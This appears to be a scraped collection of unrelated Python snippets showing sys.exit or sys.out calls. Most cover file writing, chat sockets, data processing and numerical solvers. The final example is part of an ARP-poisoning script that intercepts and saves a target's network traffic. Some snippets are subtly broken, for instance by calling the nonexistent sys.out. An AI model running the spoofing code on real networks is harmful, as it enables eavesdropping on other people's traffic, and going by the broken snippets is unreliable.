Example #1
    def sort_write_lp(self, ph, ObjObject, ConstraintMap, StageToConstraintMap,
                      remaining_lpfile_rows):

        try:
            print("\nWrite the LP file for dd in sorted_LPfile.lp\n")
            lp = open("sorted_LPfile.lp", "w")
        except IOError:
            print("IO Error so that sorted_LPfile.lp cannot be created.")
            sys.out(1)

        # keep track of input file names
        self.input_file_name_list.append('sorted_LPfile.lp')

        # for the matrix.sc file we need to know which constraint is
        # in which row:
        MatrixEntries_ConstrToRow_Map = {}

        lp.write(ObjObject[0] + "\n " + ObjObject[1] + ":\n")
        self.print_coeff_var_from_map(ObjObject[2], lp)

        # assume blank line before and after constraint indicator
        lp.write("\ns.t.\n")

        FirstStage = StageToConstraintMap['FirstStage']
        ConstrNames = list(ConstraintMap.keys())
        ConstrNames.sort()
        RememberSecStageConstr = []
        # so that we know in which rows the constraints with
        # stochastic data are (first row has index 0)
        count_rows = -1

        for name in ConstrNames:
            # check if constraint is in first stage
            if name in FirstStage:
                lp.write("\n" + name + ":\n")
                count_rows += 1
                MatrixEntries_ConstrToRow_Map[name] = count_rows
                self.print_coeff_var_from_map(ConstraintMap[name][0], lp)
                lp.write(ConstraintMap[name][1] + " " +
                         ConstraintMap[name][2] + "\n")
            else:
                RememberSecStageConstr.append(name)

        MatrixEntries_ConstrToRow_Map = \
            self._sort_print_second_stage_constr(ph,
                                                 RememberSecStageConstr,
                                                 lp,
                                                 ConstraintMap,
                                                 count_rows,
                                                 MatrixEntries_ConstrToRow_Map)

        # print the remaining rows of the lp file
        for row in range(len(remaining_lpfile_rows)):
            lp.write("\n")
            for i in range(len(remaining_lpfile_rows[row])):
                lp.write(remaining_lpfile_rows[row][i] + " ")

        lp.close()
        #print MatrixEntries_ConstrToRow_Map
        return MatrixEntries_ConstrToRow_Map
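
For orientation, the returned MatrixEntries_ConstrToRow_Map simply pairs each constraint name with its 0-based row index in sorted_LPfile.lp. A hypothetical caller-side sketch (the receiver object 'writer' and the argument values stand in for whatever the surrounding code provides):

# Hypothetical use of the returned constraint-to-row map; 'writer' is an
# assumed instance of the class that defines sort_write_lp.
row_map = writer.sort_write_lp(ph, ObjObject, ConstraintMap,
                               StageToConstraintMap, remaining_lpfile_rows)
for name, row in sorted(row_map.items(), key=lambda kv: kv[1]):
    print("row %d: %s" % (row, name))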
Example #2
 def save_data(self, data):
     try:
         with open(self.FILE, "wb") as f:
             pickle.dump(data, f)
     except (OSError, pickle.PicklingError):
         print("An error occurred while exporting.")
         sys.exit(1)
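
A complementary loader for the same class could look like the sketch below; the method name and the reuse of self.FILE are assumptions for illustration:

def load_data(self):
    # Hypothetical counterpart to save_data above: read the pickled object back.
    try:
        with open(self.FILE, "rb") as f:
            return pickle.load(f)
    except (OSError, pickle.UnpicklingError):
        print("An error occurred while importing.")
        sys.exit(1)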
Example #4
def receive_message():
	while True:
		incoming_message = client.recv(4096)
		if not incoming_message:
			# an empty read means the server closed the connection
			message_list.insert(END, ' ')
			message_list.insert(END, 'DISCONNECTED FROM SERVER')
			message_list.insert(END, ' ')
			sys.exit()
		else:
			incoming_message = incoming_message.decode()
			incoming_message = '<' + host + '(' + host_ip + ')' + '> : ' + incoming_message
			message_list.insert(END, incoming_message)
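
The sending half of the same Tkinter chat client would look roughly like the sketch below; entry_field is an assumed input widget, while client, message_list, and END come from the snippet above:

def send_message():
	# Hypothetical sender; 'entry_field' is an assumed Tkinter Entry widget.
	outgoing_message = entry_field.get()
	client.send(outgoing_message.encode())
	message_list.insert(END, '<me> : ' + outgoing_message)
	entry_field.delete(0, END)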
Example #5
def wait():
	global button
	global money
	
	global q
	
	q = -1
	a = input('Insert your money:')
	money += a
	print "You have %d won" % money
	if a == -1:
		sys.exit()
	if money >= 0:
		select()
Example #6
	def compute_test_error(self,restore_directory):
		# Build model and initialize variables
		self.build_model()
		self.initialize_variables()
		# Check if restore directory actually exists
		if not os.path.exists(restore_directory):
			sys.out("Restore directory not valid")
		restoreFile = restore_directory + "/ConvNet.ckpt"
		# Start TensorFlow session
		with tf.Session() as sess:
			# TensorFlow initialization
			sess.run(self.init)
			# Restore the network
			self.system_saver.restore(sess, restoreFile)
			# Read lists describing test and training set
			self.DataSet.read_training_test_set_list()
			self.DataSet.read_last_batch_image()
			# Compute Roc score for the whole test set
			RealTargets = []
			PredictedTargets = []
			step = 1
			NTestData = self.DataSet.NtestData
			while step * self.batch_size < NTestData:
				# Load new test batch
				batch_x, batch_y = self.DataSet.next_test_batch()
				# Predict labels
				Y_pred = sess.run(self.predicted_classes, feed_dict={self.x: batch_x,\
										self.keep_prob: 1.0})
				PredictedTargets = PredictedTargets + list(Y_pred)
				# Format true targets
				for target in batch_y:
					if target[0] == 1.0:
						RealTargets.append(0)
					elif target[1] == 1.0:
						RealTargets.append(1)
				step = step + 1
		# Compute scores: area under the ROC and total accuracy
		ROCscore = roc_auc_score(RealTargets, PredictedTargets)
		accuracy = float(np.sum(map(int, np.equal(RealTargets, \
				PredictedTargets)))) / float(len(RealTargets))
		# Print results on std out
		print "Scores obtained on the whole test dataset"
		print "Accuracy = ", accuracy
		print "Area under the ROC = ", ROCscore
Example #7
def receive_message():
	global conn
	#obtaining client host name and port
	conn, addr = server.accept()
	info_5=str(addr) + ' has joined the server.'
	message_list.insert(END,info_5)
	message_list.insert(END,' ')
	message_list.insert(END,'MESSAGE FACILITY ACTIVE')
	message_list.insert(END,' ')
	while True:
		#receiving messages from the client
		incoming_message=conn.recv(4096)
		if not incoming_message:
			message_list.insert(END,' ')
			message_list.insert(END,'Client Disconnected')
			message_list.insert(END,' ')
			sys.exit()
		else:
			incoming_message=incoming_message.decode()
			incoming_message='<'+str(addr)+'>' + ' : ' + incoming_message
			message_list.insert(END,incoming_message) 
Example #8
def main(opts):
    img_path = Path(opts.image_path)
    if not img_path.exists():
        print('ERROR: image file does not exist or cannot be accessed')
        sys.exit(-1)

    embed_path = Path(opts.embed_path)
    if not embed_path.exists():
        print('ERROR: embeddings file does not exist or cannot be accessed')
        sys.exit(-1)

    embeddings = np.load(embed_path, allow_pickle=True).item()
    if img_path.name not in embeddings:
        print('ERROR: could not find the image filename in the embeddings npy')
        sys.exit(1)

    img = Image.open(img_path)
    colors = sns.color_palette('Set2')
    fnt = ImageFont.truetype('Pillow/Tests/fonts/FreeMono.ttf', 30)

    for idx, face in enumerate(embeddings[img_path.name]['faces']):
        canvas = ImageDraw.Draw(img)
        color = tuple([int(255 * c) for c in colors[idx]])
        canvas.rectangle(face['bbox'], fill=None, outline=color)
        canvas.text((face['bbox'][0], face['bbox'][1]),
                    str(idx),
                    font=fnt,
                    fill=(color[0], color[1], color[2], 255))

    img.show()
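
A minimal way to drive main() from the command line, sketched under the assumption that opts comes from argparse with flag names matching the attributes used above (the original wiring is not shown):

# Hypothetical CLI wiring; the flag names are inferred from opts.image_path
# and opts.embed_path above, not taken from the original script.
import argparse

if __name__ == '__main__':
    parser = argparse.ArgumentParser()
    parser.add_argument('--image_path', required=True)
    parser.add_argument('--embed_path', required=True)
    main(parser.parse_args())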
Example #9
def extractData():
    fileNames = glob.glob('Taxi\\*.csv')
    if len(fileNames) == 0:
        print('Data does not exist for processing. Please download data first')
        sys.exit(1)

    for fileName in fileNames:
        print("Reading file: {0}".format(fileName))
        extracted_month = fileName.replace('Taxi\\yellow_tripdata_',
                                           '').replace('.csv', '')
        #Read the csv for the month
        df = pd.read_csv(fileName)
        #Extract and add the travel date in the dataframe
        print("Adding travel date in the dataframe")
        df['travel_date'] = df['tpep_pickup_datetime'].apply(
            lambda x: datetime.strptime(x, '%Y-%m-%d %H:%M:%S').date())
        print("Creating file structure")
        for i in df.VendorID.unique():
            print("Filtering Vendor: {0}".format(i))
            dfi = df[df['VendorID'] == i]
            #print(dfi.head())
            for dt in dfi.travel_date.unique():
                print("Filtering Date: {0}".format(dt))
                dfidt = dfi[dfi['travel_date'] == dt]
                #Create folder
                data_file_folder = 'Data/' + str(
                    i) + '/' + extracted_month + '/original/'
                if not os.path.exists(data_file_folder):
                    os.makedirs(data_file_folder)
                #file format Data/VendorId/Month/original/Day.csv
                data_file_name = data_file_folder + str(dt) + '.csv'
                print("CSV created: {0}".format(data_file_name))
                dfidt.to_csv(data_file_name,
                             sep=',',
                             encoding='utf-8',
                             index=False)
    print('Data extraction complete')
Example #10
try:
    # import tarfile
    # import re
    from pyspark.sql.window import Window
    import datetime as dt
    # import os
    import sys
    from pyspark import SparkContext
    from pyspark.sql import SparkSession
    from pyspark.conf import SparkConf
    import numpy as np
    from recommendation_generation_engine_s import *
except Exception as e:
    message = 'error importing libraries in file running daily'
    print message
    print e
    sys.exit(1)

##########################################################################
# spark

spark = get_spark_session_object()
print "importing and initialisation finished"


##########################################################################

def main():
    # load files
    # bxu updates
    # commented by bxu
    # dh_activity, _, relevant_urlid = file_loader(
Example #11
try:
    FN = open(DTA, "r")
except:
    print("\t***\"" + DTA + "\" was not found")
    sys.exit("**** End of Program ****")
#endTrydat
Tuples = FN.readlines()
n = len(Tuples)
print("Tuples:     " + str(n))
LineLen = len(Tuples[0])
Atribs = NumCols(Tuples[0], LineLen)
m = Atribs
print("Attributes: " + str(m))
print("INDEPENDENT VARIABLES: " + str(m - 1))
IV = m - 1
if (IV > MaximumNumberOfIndependentVariables):
    print("Exceeded number of maximum allowed independent variables")
    sys.out("***\t\tPROGRAM WILL NOW END\t\t***")
#endif
print("\tDEPENDENT VARIABLE IS IN COLUMN " + str(m))
print()
dummy = input("\"ENTER\" to continue\n")
FN = open(DTA, "r")  # REWIND
xy = list(range(0, n + 1))
for i in range(0, n + 1):
    xy[i] = list(range(0, m + 1))
#
#       PUT THE DATA INTO xy[i][j] AS FLOATING POINT
#
for i in range(0, n):  # n tuples  (i=0,1,...,n-1)
    for j in range(0, m):  # m columns (j=0,1,...,m-1)
        L = Tuples[i]
        Num = getNum(L, j)  #"Num" is Floating point
Example #12

def get_systems(domain=""):
    nextfeed = etree.fromstring(
        requests.get(FEEDS.format(domain=domain)).text.encode('utf-8'))
    cities = nextfeed.xpath("/markers/country/city")
    new_cities = []
    for c in cities:
        if 'city_uid' in c.attrib:
            uid = int(c.attrib['city_uid'])
        elif 'uid' in c.attrib:
            uid = int(c.attrib['uid'])
        else:
            raise Exception("This city has no uid")
        found = next(
            (i for i in sysdef['instances'] if i['city_uid'] == uid), None)
        if not found:
            new_cities.append(c)
    if args.verbose:
        sys.stderr.write(">> Found %d new cities in %s\n" % (
            len(new_cities), domain))
    systems = map(lambda c: Nextfeed(c, domain), new_cities)
    return systems

for domain in args.domain.split(','):
    systems = get_systems(domain)
    sysdef['instances'] += map(lambda s: s.out(), systems)  # Nextfeed.out(), not the sys module

filewriter.write(json.dumps(sysdef, indent=4, separators=(',', ':')))
filewriter.write("\n")
Example #13
    crawledVouchers = set(re.compile(r'([A-Z0-9]{4}-[A-Z0-9]{4}-[A-Z0-9]{4})').findall(voucherSource))
    total_numberof_vouchers = len(crawledVouchers)

print('Number of vouchers found: ' + str(len(crawledVouchers)))
printSeparator()

index = 0
for voucher in crawledVouchers:
    index += 1
    print('Voucher %d : %s' % (index, voucher))
printSeparator()

logged_in = loginAccount(br, settings)
if not logged_in:
    print('Login error')
    sys.exit(1)

printSeparator()
user_input_article_url = None
url_article_30euro = 'https://www.aral-supercard.de/shop/produkt/aral-supercard-einkaufen-tanken-30-2123'
url_article_40eurojp = 'https://www.aral-supercard.de/shop/produkt/jp-performance-einkaufen-tanken-individueller-wert-sondermotiv-motor-show-2124'
while True:
    print(
        'Warning! All vouchers will be ordered to your preferred address! Check your address before you start the redemption!')
    print('Choose which promotion your vouchers come from:')
    print('1 = 30+5 euro --> promotion URL: %s' % url_article_30euro)
    print('2 = 40+6 euro JP --> promotion URL: %s' % url_article_40eurojp)
    print('3 = Other promotion / enter the link to the promotion article yourself')
    user_input = userInputDefinedLengthNumber(1)
    if user_input < 0 or user_input > 3:
        # Bad user input
Example #14
                        default="posfreq_results",
                        type=str,
                        help="directory where results will be saved")
    parser.add_argument(
        "--english_freq_fn",
        default=0.01,
        type=float,
        help=
        "if do_freq is used and the language is English, you need to provide the path to the Google Ngrams frequency file"
    )

    args = parser.parse_args()

    if args.language == "en" and not args.english_freq_fn:
        sys.exit(
            "Provide a path to a file containing Google Ngrams frequencies in English with --english_freq_fn"
        )

    if not os.path.exists(args.out_dir):
        os.makedirs(args.out_dir)

    # Load data for that language
    data, word_dict = load_data(language)
    freq_counts = load_freq_counts(language, args.english_freq_fn)

    ######### 1. DATASET ANALYSIS
    # 1.1 CHECK THE DISTRIBUTION OF POS OVER BANDS
    pos_by_word, pos_by_band, pos_by_band_props = posdist_overbands(word_dict)
    # 1.2 CHECK THE DISTRIBUTION OF FREQ OVER BANDS
    freqband_by_word_4, freq_by_band_4, freq_by_band_4_props = freqdist_overbands(
        word_dict, freq_counts)
Example #15
def map_activities(city,
                   categories=None,
                   time_intervals=None,
                   color_patterns=None,
                   max_intensity=1,
                   geojson=False,
                   geojson_options={},
                   verbose=False):
    """
    It creates a gmaps object which is going to be used to plot all the
    activity locations on a map.

    Parameters
    ----------
    city : string
        Name of the city whose activities we want to map.
    categories : dictionary of categories
        This dictionary has category ids as keys and category labels as items.
    time_intervals : either a datetime object or a list of datetime objects
        Each datetime object describes either both limits of a time interval or
        just one. In this last case, the time interval is calculated by using
        the current time as the other limit of the time interval.
    color_patterns : either a string or a list of strings
        A string that defines which color pattern will be used in the plot. If
        a color pattern is defined for each category, they will be colored
        according to this list. More information about these patterns in the
        constants.py file.
    max_intensity : float
        A value that sets the maximum intensity for the heat map.
    geojson : boolean
        If True, it uses a geojson file of the city to map an additional
        population density layer.
    geojson_options : dict
        Dictionary containing geojson options like
            colorscheme = 'Greys','viridis','inferno','plasma'
            invert = True or False for inverting the colorscheme
            opacity = int in the range of [0,1]
    verbose : boolean
        If true, it will display the numeric results of the total number of
        events that were found in each district.

    Returns
    -------
    my_map : gmaps object
        This object will be used to plot the map and all activities locations
        in a Jupyter Notebook.
    """
    my_map = gmaps.figure()

    # If geojson==True use an additional layer for the population density
    if geojson:
        colorscheme = geojson_options.get('colorscheme')
        opacity = geojson_options.get('opacity')
        invert = geojson_options.get('invert', False)
        districts_layer = load_districts_layer(city,
                                               colorscheme=colorscheme,
                                               opacity=opacity,
                                               invert=invert,
                                               verbose=verbose)

        my_map.add_layer(districts_layer)

    # Define initial variables, if needed
    if categories is None:
        categories = local_categories

    if max_intensity < 0:
        print("Parameter error: max_intensity must be a positive float.")
        sys.exit(1)

    parsed_color_patterns = color_patterns_parser(color_patterns)

    # Apply a different color pattern for every layer by using a counter
    counter = 0

    # Choose an iterator depending on the filter chosen in the input parameters
    iterator = categories.items()
    iterator_type = "category"

    if time_intervals is not None:
        time_intervals = datetime_parser(time_intervals)
        iterator = enumerate(time_intervals)
        iterator_type = "time interval"

    for index, value in iterator:
        if iterator_type == "category":
            events_data, num_activities = read_custom_csv(
                './csv/{}.csv'.format(city), [
                    index,
                ])
            # Filter those events with wrong or unknown locations
            locations = locations_parser(events_data)

        elif iterator_type == "time interval":
            events_data, num_activities = read_custom_csv(
                './csv/{}.csv'.format(city), [i for i in categories])
            # Filter those events with wrong or unknown locations
            locations = locations_parser(events_data, value)

        if len(locations) == 0:
            print("No local activities were found in " +
                  "{} matching {}: {}".format(city, iterator_type, value))
            continue

        layer = gmaps.heatmap_layer(locations)

        layer.gradient = parsed_color_patterns[counter]

        layer.max_intensity = max_intensity
        layer.point_radius = co.POINT_RADIUS
        my_map.add_layer(layer)

        counter = cyclic_iteration(counter, len(parsed_color_patterns) - 1)

    return my_map
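
A minimal notebook usage sketch for map_activities; the city name and category ids are illustrative assumptions, and the call expects a ./csv/<city>.csv file as read by read_custom_csv above:

# Hypothetical Jupyter usage; 'Madrid' and the category mapping are examples.
categories = {17: 'Music', 23: 'Sports'}  # assumed {category_id: label} dict
my_map = map_activities('Madrid',
                        categories=categories,
                        max_intensity=0.8,
                        verbose=True)
my_map  # displaying the gmaps figure renders the map in the notebook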
Example #16
    def run(self):
        lamda = 0.
        lamda0 = 0.
        dlamda = self.dlamda
        step = 0
        DeltaL = 0.
        DeltaL0 = 0.
        current_iteration = 0
        dLamdaPredict = 0.0
        #################################
        ## FIRST STEP : NEWTON-RAPHSON ##
        #################################
        step += 1
        lamda = lamda0 + dlamda
        Delta_u = np.zeros((2 * len(self.truss.nodes), 1))

        print '\n---NormalPlaneArcLengthAlgorithm :: Newton Raphson - Load level, lambda =', lamda, ' ---'

        #Apply loads:
        self.truss.applyNodalLoads(lamda)
        #Compute tangent stiffness matrix:
        Kt = self.truss.buildKt(self.computeTangentMethod)
        #Get the out of balance forces:
        g = self.truss.getOOBF()
        #Solve the linear system:
        du = np.linalg.solve(Kt, -g)
        #Get the global loads vector:
        qef = self.truss.get_qef()
        #Update deltaU:
        Delta_u += du
        #Update positions:
        self.truss.incrementPositions(Delta_u)
        #Compute the error:
        error = self.computeError(g, lamda)
        current_iteration = 0
        #Loop of the Newton-Raphson algorithm:
        while error > self.toll and current_iteration < self.nItMax:
            #Get the tangent stiffness matrix:
            Kt = self.truss.buildKt(self.computeTangentMethod)
            #Get the out of balance forces:
            g = self.truss.getOOBF()
            #Solve the linear system:
            du = np.linalg.solve(Kt, -g)
            #Update du:
            Delta_u += du
            #Update positions:
            self.truss.incrementPositions(Delta_u)
            #Compute the error:
            error = self.computeError(g, lamda)
            current_iteration += 1
        if error > self.toll:
            print "NormalPlaneArcLengthAlgorithm :: N.-R. didn't converge."
            sys.exit()
        #Compute deltaL_0 and deltaL:
        DeltaL0 = math.sqrt(
            np.transpose(Delta_u).dot(Delta_u) +
            self.psi**2 * lamda**2 * np.transpose(qef).dot(qef)
        )  # TODO: redo this
        DeltaL = DeltaL0
        lamda0 = lamda
        #Update the truss:
        self.truss.update()
        self.archive(lamda, current_iteration)
        self.display(step, lamda)

        #####################
        ## PREDICTOR PHASE ##
        #####################
        while lamda < self.lamdaMax and not self.stopit:
            print "-- NormalPlaneArcLengthAlgorithm:: The predictor at step ", step, "     \r",
            step += 1
            #Apply loads to the truss:
            self.truss.applyNodalLoads(lamda)

            current_iteration = 0
            Delta_u = np.zeros((2 * len(self.truss.nodes), 1))
            #Get the tangent stiffness matrix:
            Kt = self.truss.buildKt(self.computeTangentMethod)
            #Compute the out of balance forces:
            g = self.truss.getOOBF()
            #Compute the global loads vector:
            qef = self.truss.get_qef()
            #Try to invert the tangent stiffness matrix:
            try:
                Kt_inv = np.linalg.inv(Kt)
            except np.linalg.LinAlgError:
                print "Kt is not invertible"
                print(Kt)
                sys.exit()
            else:
                deltaP = -Kt_inv.dot(g)
                deltaPt = Kt_inv.dot(qef)

                Ct1 = np.transpose(deltaP).dot(deltaP) * np.transpose(
                    deltaPt).dot(deltaPt) + (
                        DeltaL**2 - np.transpose(deltaP).dot(deltaP)) * (
                            np.transpose(deltaPt).dot(deltaPt) +
                            self.psi**2 * np.transpose(qef).dot(qef))
                if Ct1 < 0:
                    print "Ct1 is negative. Can't take its square root."
                    sys.exit()
                else:
                    Ct1 = math.sqrt(Ct1)
                #Verify that the matrix is positive definite:
                if np.all(np.linalg.eigvals(Kt) > 0):
                    dlamda = (-np.transpose(deltaP).dot(deltaPt) +
                              Ct1) / (np.transpose(deltaPt).dot(deltaPt) +
                                      self.psi**2 * np.transpose(qef).dot(qef))
                else:
                    dlamda = (-np.transpose(deltaP).dot(deltaPt) -
                              Ct1) / (np.transpose(deltaPt).dot(deltaPt) +
                                      self.psi**2 * np.transpose(qef).dot(qef))
                dLamdaPredict = dlamda
                du = deltaP + dlamda * deltaPt
                DuPredict = du
                Delta_u += du
                lamda = lamda0 + dlamda
                #Update the positions:
                self.truss.incrementPositions(Delta_u)
                #Compute the error:
                error = self.computeError(g, lamda)

                #####################
                ## CORRECTOR PHASE ##
                #####################
                while error > self.toll and current_iteration < self.nItMax:
                    #print "lamda = ", lamda
                    #Apply loads:
                    self.truss.applyNodalLoads(lamda)
                    #Build Kt:
                    Kt = self.truss.buildKt(self.computeTangentMethod)
                    #Get the out of balance forces:
                    g0 = self.truss.getOOBF()
                    #Get the global loads vector:
                    qef = self.truss.get_qef()
                    #Try to invert Kt:
                    try:
                        Kt_inv = np.linalg.inv(Kt)
                    except np.linalg.LinAlgError:
                        print "Kt is not invertible"
                        print(Kt)
                        sys.exit()
                    else:
                        deltaP = -Kt_inv.dot(g0)
                        deltaPt = Kt_inv.dot(qef)
                        #Solve equation (18) by first finding both coefficients:
                        a1 = dLamdaPredict * self.psi**2 * np.transpose(
                            qef).dot(qef)
                        a1 = a1 + np.transpose(deltaPt).dot(DuPredict)
                        a2 = np.transpose(DuPredict).dot(deltaP)

                        lamda1 = -a2 / a1
                        dlamda += lamda1

                        du = deltaP + lamda1 * deltaPt
                        #Update:
                        Delta_u += du
                        lamda = lamda0 + dlamda
                        self.truss.incrementPositions(Delta_u)
                        error = self.computeError(g0, lamda)
                        current_iteration += 1

                if current_iteration != 0:
                    DeltaL = DeltaL0 * math.sqrt(
                        float(self.Id) / current_iteration)

                else:
                    print "Error : should not end up here !"
                self.truss.update()
                self.archive(lamda[0, 0], current_iteration)
                self.display(step, lamda)
                lamda0 = lamda

        print ""
        return 1
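
A hypothetical driver for this algorithm; the Truss class and the constructor signature are assumptions inferred from the attributes referenced in run() above (dlamda, lamdaMax, toll, nItMax, psi):

# Hypothetical usage sketch; none of this wiring appears in the original excerpt.
truss = Truss('truss_input.dat')
algo = NormalPlaneArcLengthAlgorithm(truss, dlamda=0.05, lamdaMax=1.0,
                                     toll=1e-6, nItMax=50, psi=1.0)
algo.run()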
Example #17
print "[*] Setting up %s" % interface

gateway_mac = get_mac(gateway_ip)

if gateway_mac is None:
    print "[!!!] Failed to get gateway MAC. Exiting"
    sys.exit(1)
else:
    print "[*] Gateway %s is at %s" % (gateway_ip, gateway_mac)

target_mac = get_mac(target_ip)

if target_mac is None:
    print "[!!!] Failed to get target MAC. Exiting"
    sys.exit(1)
else:
    print "[*] Target %s is at %s" % (target_ip, target_mac)

# start poison thread
poison_thread = threading.Thread(target=poison_target, args=(gateway_ip, gateway_mac, target_ip, target_mac))
poison_thread.start()

try:
    print "[*] Starting sniffer for %d packets" % packet_count

    bpf_buffer = "ip host %s" % target_ip
    packets = sniff(count = packet_count, filter = bpf_buffer, iface = interface)

    # write out the captured packets
    wrpcap('arper.pcap', packets)